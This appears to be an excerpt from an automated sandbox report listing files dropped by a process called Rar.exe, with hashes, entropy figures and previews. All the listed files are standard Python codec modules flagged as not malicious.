                                                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec koi8_u generated from 'python-mappings/KOI8-U.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='koi8-u',.. encode=Codec(
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):14030
                                                                                                                                                                                                                                  Entropy (8bit):4.572243714560591
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:Mn/GuINDBTXqJPnXEeXGyQCmEYcrj6CbwK+avSMcdgF:LNneXGy1lHwK+avSMNF
                                                                                                                                                                                                                                  MD5:F4729A1242BD140B732D4BEE6E137558
                                                                                                                                                                                                                                  SHA1:44EFA222BB2CA9ADD776C29A098F9F03FF03E515
                                                                                                                                                                                                                                  SHA-256:DA8BAC477F14620D8AA89EB6CB8963602E1C39724148369C88EF48C95D495011
                                                                                                                                                                                                                                  SHA-512:F5812E38B06620752A557FA70F207AA3298A2FEC7598107BCE749F5B1529A8CA92CAC5AD72E068F6F711C714868389861E93B25B484FA2AD13FC8B3A50EE797E
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec kz1048 generated from 'MAPPINGS/VENDORS/MISC/KZ1048.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self, input, errors='strict'):.. return codecs.charmap_encode(input, errors, encoding_table).... def decode(self, input, errors='strict'):.. return codecs.charmap_decode(input, errors, decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input, self.errors, encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input, self.errors, decoding_table)[0]....class StreamWriter(Codec, codecs.StreamWriter):.. pass....class StreamReader(Codec, codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='kz1048',..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1314
                                                                                                                                                                                                                                  Entropy (8bit):4.724793488479122
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:J4OSEHV0yWJyWKMufQ2hQZUQWSJzWSJDtyWVyWg9ZKj9b1QJxFplR:J4OSJui6SJ6SJ8TKnQJxTz
                                                                                                                                                                                                                                  MD5:92C4D5E13FE5ABECE119AA4D0C4BE6C5
                                                                                                                                                                                                                                  SHA1:79E464E63E3F1728EFE318688FE2052811801E23
                                                                                                                                                                                                                                  SHA-256:6D5A6C46FE6675543EA3D04D9B27CCCE8E04D6DFEB376691381B62D806A5D016
                                                                                                                                                                                                                                  SHA-512:C95F5344128993E9E6C2BF590CE7F2CFFA9F3C384400A44C0BC3ACA71D666ED182C040EC495EA3AF83ABBD9053C705334E5F4C3F7C07F65E7031E95FDFB7A561
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:""" Python 'latin-1' Codec......Written by Marc-Andre Lemburg (mal@lemburg.com).....(c) Copyright CNRI, All Rights Reserved. NO WARRANTY....."""..import codecs....### Codec APIs....class Codec(codecs.Codec):.... # Note: Binding these as C functions will result in the class not.. # converting them to methods. This is intended... encode = codecs.latin_1_encode.. decode = codecs.latin_1_decode....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.latin_1_encode(input,self.errors)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.latin_1_decode(input,self.errors)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....class StreamConverter(StreamWriter,StreamReader):.... encode = codecs.latin_1_decode.. decode = codecs.latin_1_encode....### encodings module API..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:CSV text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):37165
                                                                                                                                                                                                                                  Entropy (8bit):4.736863402692657
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:RakostECDXJVf+hiOjiU6Q3DBEQ12yWQZr75CAwKC1/h:Ukost5LX2htjN6QT682PQx5PwVJ
                                                                                                                                                                                                                                  MD5:C269925332C46C7A774FBFCAD74F4B66
                                                                                                                                                                                                                                  SHA1:5F9542A16C83A7EE831F320507BD87756B398DCF
                                                                                                                                                                                                                                  SHA-256:F5C262F930F3B7D83466283347F8B0D7B5C7CBF18DD6FCEB4FAF93DBCD58839E
                                                                                                                                                                                                                                  SHA-512:5BAE57045F650E062EAEA05106F726A0C9B29409CA6CD9667338473DF8CA779BE8965C5F8BD5D87B2DDB76024794AFFC92FF98850D0D0161269133AC3B2F7825
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec generated from 'VENDORS/APPLE/ARABIC.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_map).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_map)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='mac-arabic',.. encode=Codec().encode,
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):13940
                                                                                                                                                                                                                                  Entropy (8bit):4.577897629122807
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:wHhsuOTDvRI7ZpouhIAs2+iy2w4kN8gzeqBwHr+:tTZuhIAl+4E16ap
                                                                                                                                                                                                                                  MD5:C3FC8C5389BFDF1371B849C38FE1A20C
                                                                                                                                                                                                                                  SHA1:009654FD007C938E2FC889B64954FD139EE051E8
                                                                                                                                                                                                                                  SHA-256:68539CA54FFD5D96C07F3590E720D8A28009CB7CAA13E607AC3084D19DD5A19A
                                                                                                                                                                                                                                  SHA-512:8F81FD2106ED43E0CE34004576ED99D77FB6766EC6B757EB4F8B815742E86F90C36CDBAF19E9C3BE3D4F2B92B94695D014721C4A2D7E22312155BE7FBA1164BA
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec mac_croatian generated from 'MAPPINGS/VENDORS/APPLE/CROATIAN.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='mac-croatian',..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):13761
                                                                                                                                                                                                                                  Entropy (8bit):4.613646718299373
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:8HhsuOTDvRA7ZpouhIAs2+i4Xm8jLPeqBap+f:pTduhIAl+mmia1f
                                                                                                                                                                                                                                  MD5:69AF178D83304D0AB6260D64CC9C734F
                                                                                                                                                                                                                                  SHA1:AA73ADF92F5762F559B26C9858590AA750D4F25F
                                                                                                                                                                                                                                  SHA-256:AC11E1F54789AFF782D79FE7D6FD52183EF0F57B6AC4A0F680353FE0113F0D4D
                                                                                                                                                                                                                                  SHA-512:A42B7C7CD5E6AE157B1DCE131264C353DF0FF6FEA09B06D1498EF07931D94D91C48D311964E0F35D4DF893CE65BFD5F3339BB9E1541DFBE2A2FEED25A478E9F9
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec mac_cyrillic generated from 'MAPPINGS/VENDORS/APPLE/CYRILLIC.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='mac-cyrillic',..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:CSV text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):15477
                                                                                                                                                                                                                                  Entropy (8bit):4.803106966743048
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:4HhsuOTDvRe7Zt+/UxcXwz1BhFouhCuMQ+iujx5zCdxeiu5iEpkHzWO0yfZBcsWR:FTPuhCuj6fHmHzp03
                                                                                                                                                                                                                                  MD5:46E0758A4DF808F2649BD6B7262362BA
                                                                                                                                                                                                                                  SHA1:A647995DAE668E9D2EDF34529CF1DDDD06AC8016
                                                                                                                                                                                                                                  SHA-256:B0F1FA8399AD1844EF5F07ACFCD523585AB576F411D845A008A610FF6A25AD31
                                                                                                                                                                                                                                  SHA-512:ABB217D00013E01B89855773B9CA728F2F0D14C9E3A7F4CC705588D458CB06E93A6FC187F87FD084F78E0668094324F9D0857D58CFC68D04A8883C8973BB6A77
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec mac_farsi generated from 'MAPPINGS/VENDORS/APPLE/FARSI.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='mac-farsi',.. e
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):14028
                                                                                                                                                                                                                                  Entropy (8bit):4.6264619578502515
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:WlHhsuOTDvRT7ZpouhIAs2+iEh+GsHlIu/lwqBxTj/Fq3FHEj:rTCuhIAl6+GeJ/Wa3QVQ
                                                                                                                                                                                                                                  MD5:338143EC1BC5F5DDE251657BECC4667A
                                                                                                                                                                                                                                  SHA1:E68BFEAB6E5209748AC47B44505E6CA581141647
                                                                                                                                                                                                                                  SHA-256:4C67D361F922B611213FD8FEB9FCAAA9FF8CB57CD961F1CA1B5CF4483B1DEE66
                                                                                                                                                                                                                                  SHA-512:D58D0F6309FCF945FF25F7B5D825E8BAB1BFBDB40490110ADBA51B587AED5BE101A22C22CA99B9A4FF9B355F8E7980A713EA6CDD550403B37915EB79796E8A39
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec mac_greek generated from 'MAPPINGS/VENDORS/APPLE/GREEK.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='mac-greek',.. e
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):13805
                                                                                                                                                                                                                                  Entropy (8bit):4.569004919357403
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:+HhsuOTDvRB7ZpouhIAs2+iy2wkKY2gKPeqBamec6U6+8:LTcuhIAl+k3LFam
                                                                                                                                                                                                                                  MD5:8FF7EE70CFFA2B336AEE3367796C96ED
                                                                                                                                                                                                                                  SHA1:1F26D1C59F9A124AD334FB2BB3FC1E3D605587FA
                                                                                                                                                                                                                                  SHA-256:64DE55FD0EA0FE4D2512B2303DCB3D20CC57061D78D08A11D3AA6F19E1877826
                                                                                                                                                                                                                                  SHA-512:6D0A64EBFA6F29FD5317043F9C08D0D1F68A39B6640615B2EF093C99629479CE8562C29AEA6509E2FEB255BFE93D0E9FCE9FB1DB43F86F17FE366ADC2788FC7F
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec mac_iceland generated from 'MAPPINGS/VENDORS/APPLE/ICELAND.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='mac-iceland',..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):14430
                                                                                                                                                                                                                                  Entropy (8bit):4.621572363853459
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:S3hsuOTDvRNUrXPLouhIAs2+iDK19L4vJPeqB48:hTnuhIAlmP4EaD
                                                                                                                                                                                                                                  MD5:BAF2B9E09D011F78EA36ED2CC5ED22FD
                                                                                                                                                                                                                                  SHA1:77B62918E1FAFD837EEE086C552265384BB506B4
                                                                                                                                                                                                                                  SHA-256:74C9045009FABFFA3E81B5B41D97A85860BA42D109DB6673A276EA8BA9B59E56
                                                                                                                                                                                                                                  SHA-512:5FB69F8A5FB424B7872B3872CB75B3B538A35533BFE8F8AFFEC44D82B372C866D1841B2568680ACB954CEB696A92EE3091DC06F04EA89DB5651F35F5667B6DA1
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec mac_latin2 generated from 'MAPPINGS/VENDORS/MICSFT/MAC/LATIN2.TXT' with gencodec.py.....Written by Marc-Andre Lemburg (mal@lemburg.com).....(c) Copyright CNRI, All Rights Reserved. NO WARRANTY...(c) Copyright 2000 Guido van Rossum....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(C
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):13787
                                                                                                                                                                                                                                  Entropy (8bit):4.580644681215749
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:wHhsuOTDvR27ZpouhIAs2+iy2w4KY2gKPeqBaoG5:tT/uhIAl+43LFaW
                                                                                                                                                                                                                                  MD5:1F99EDC6D4A3BA200295364C52D6038D
                                                                                                                                                                                                                                  SHA1:8FD1FF1EEC2F74907935621572360E7E53FE7038
                                                                                                                                                                                                                                  SHA-256:6BF6FDE10F2350232DE5EE47D27CAE885362602443B59A924DE8EB6998B18BB2
                                                                                                                                                                                                                                  SHA-512:2924BFF1C570128D57711F91CE1A87B5D156A24144FA3FEBDDDF6C9BB7B82570FB1F9B9FB1C5D23CD9625BF5568F42B718DB3A432F35B47DFF9E72FAE199EA56
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec mac_roman generated from 'MAPPINGS/VENDORS/APPLE/ROMAN.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='mac-roman',.. e
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):13968
                                                                                                                                                                                                                                  Entropy (8bit):4.599704767840293
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:FqHhsuOTDvR+7ZpouhIAs2+iy2w4kyYpDgKPeqBaj5:FHTvuhIAl+4cqFaI
                                                                                                                                                                                                                                  MD5:425337635E74A8B98CD770F43848AF18
                                                                                                                                                                                                                                  SHA1:C0F5A92D564177C49E76471117E4B521FD52DF17
                                                                                                                                                                                                                                  SHA-256:1DE13F2703A62479C4312F9A39514C7691CF7F737958B3915AF395A53A596183
                                                                                                                                                                                                                                  SHA-512:853EC8BEB168F69C36AEA83AE221AEADE920DD293928B6F9F61F8938955DF3C709169424D93F49EE05CE2C1AD487CE925808CB136CA91C5022BAD6404008AF6A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec mac_romanian generated from 'MAPPINGS/VENDORS/APPLE/ROMANIAN.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='mac-romanian',..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):13820
                                                                                                                                                                                                                                  Entropy (8bit):4.579994522132136
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:yHhsuOTDvRT7ZpouhIAs2+iy2w4KY2gKPeqB9NGc:/TquhIAl+43LFal
                                                                                                                                                                                                                                  MD5:1C214A3F28D2D23CC7FDED7A387585A0
                                                                                                                                                                                                                                  SHA1:B40E5DA5FD44499B161BD2649A6258C9A968D5D5
                                                                                                                                                                                                                                  SHA-256:E7F9E6C9F92513C69754AEF1D7AB235B09E9EEADBBCED4C86DF6E2AA2D06A1EF
                                                                                                                                                                                                                                  SHA-512:58C6B56938D709AFC4E756C2F0CC40812724B963B118CE5E1CA84798DFD17F9E324AC8F5B68FA84FE883E91CBEA8E7FC4BBE32EAE175F1B55072FAAFA7F7397A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec mac_turkish generated from 'MAPPINGS/VENDORS/APPLE/TURKISH.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='mac-turkish',..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1258
                                                                                                                                                                                                                                  Entropy (8bit):4.753222127608113
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:JwEFOXxVaniSdZSHvcGWQvnNq1I5atMufnb+s0ktzE9ZKj94JxFplR:JwEWxVaniSvIvdvNq1I5aCuzbztzETK2
                                                                                                                                                                                                                                  MD5:0D4DEB48618561417DDE714ACF399AA3
                                                                                                                                                                                                                                  SHA1:F617D8FC1B17AEC713947CDEE9BA302B4B2E71B1
                                                                                                                                                                                                                                  SHA-256:B00887A6D93C97D320CBB1C3379BD7C6DE767CCFC34ED13442891E06CC62F148
                                                                                                                                                                                                                                  SHA-512:722C9182DEAF8A8A65550EF86F967A559105BE6EB61C9FB3244521D51649B8A2B901E911A28FBB0CC42F1E680ACD0FC64B475E53DEE921287010EE112D982630
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:""" Python 'mbcs' Codec for Windows......Cloned by Mark Hammond (mhammond@skippinet.com.au) from ascii.py,..which was written by Marc-Andre Lemburg (mal@lemburg.com).....(c) Copyright CNRI, All Rights Reserved. NO WARRANTY....."""..# Import them explicitly to cause an ImportError..# on non-Windows systems..from codecs import mbcs_encode, mbcs_decode..# for IncrementalDecoder, IncrementalEncoder, .....import codecs....### Codec APIs....encode = mbcs_encode....def decode(input, errors='strict'):.. return mbcs_decode(input, errors, True)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return mbcs_encode(input, self.errors)[0]....class IncrementalDecoder(codecs.BufferedIncrementalDecoder):.. _buffer_decode = mbcs_decode....class StreamWriter(codecs.StreamWriter):.. encode = mbcs_encode....class StreamReader(codecs.StreamReader):.. decode = mbcs_decode....### encodings module API....def getregentry():.. return codecs
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1060
                                                                                                                                                                                                                                  Entropy (8bit):4.538507695911449
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:JkZSHvcGW6pjvneEq1IhhatMufko3b+00kwWzu9ZKj9wJxFplR:JSIvvBvPq1IhhaCu8M1zPzuTKiJxTz
                                                                                                                                                                                                                                  MD5:5163EF7B87B6DEE11BC7914E2AB1FF8E
                                                                                                                                                                                                                                  SHA1:92EB877FD4F77A40FC6745717139D4E335670613
                                                                                                                                                                                                                                  SHA-256:991D1FD2F4B815943EAE7F7BFA9F87E2DE980ACB08932BEA3258FB034902A15F
                                                                                                                                                                                                                                  SHA-512:99458C11DB86287A818176588DEBD76AD18401557B7D49F01FCFA85C917947CDADC310DEF539434824997922CB24005853751920EAE103B0DB04A83AB3A49E46
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:""" Python 'oem' Codec for Windows...."""..# Import them explicitly to cause an ImportError..# on non-Windows systems..from codecs import oem_encode, oem_decode..# for IncrementalDecoder, IncrementalEncoder, .....import codecs....### Codec APIs....encode = oem_encode....def decode(input, errors='strict'):.. return oem_decode(input, errors, True)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return oem_encode(input, self.errors)[0]....class IncrementalDecoder(codecs.BufferedIncrementalDecoder):.. _buffer_decode = oem_decode....class StreamWriter(codecs.StreamWriter):.. encode = oem_encode....class StreamReader(codecs.StreamReader):.. decode = oem_decode....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='oem',.. encode=encode,.. decode=decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=IncrementalDecoder,.. streamreade
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):13827
                                                                                                                                                                                                                                  Entropy (8bit):4.583791210166393
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:7hsuOTDvR1UrXPLouhIAs2+iXIcDCYBZt6CJTd12:mTDuhIAlX9Zt680
                                                                                                                                                                                                                                  MD5:3D512E1AB4D97E95DCEE526F991E685F
                                                                                                                                                                                                                                  SHA1:0349C9649CC54002699DD48E80DA09DDC21F9432
                                                                                                                                                                                                                                  SHA-256:C9E5D71C1FA128602E2D10E9BED0B271132DF349290F4465CFCA9D5DAA5BA86C
                                                                                                                                                                                                                                  SHA-512:DB6CE7BF928D829175D54328A6A37F1A8B691B04CEF1C76CE0C98B6B2C21959DF7BCA822416BFF39C2530E93F8B15CCB55E480FD1187C6258734923A10CF9878
                                                                                                                                                                                                                                  Malicious:false
